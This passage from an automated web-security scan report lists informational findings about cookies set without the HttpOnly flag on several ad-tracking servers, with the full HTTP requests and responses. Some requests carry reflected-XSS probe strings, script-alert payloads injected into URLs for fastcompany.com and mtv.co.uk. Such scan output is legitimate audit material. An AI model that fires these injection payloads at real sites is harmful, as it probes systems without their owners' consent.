GET /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7?pv=31528584146.87216&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:50:17 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

5.28. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



5.29. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



5.30. http://dts1.raasnet.com/dts/bizo/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.31. http://dts1.raasnet.com/dts/exelate/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.32. http://dts1.raasnet.com/dts/targus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.33. http://f21.360tag.com/t6/1418/MTV/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


5.34. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

5.35. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

5.36. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



5.37. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
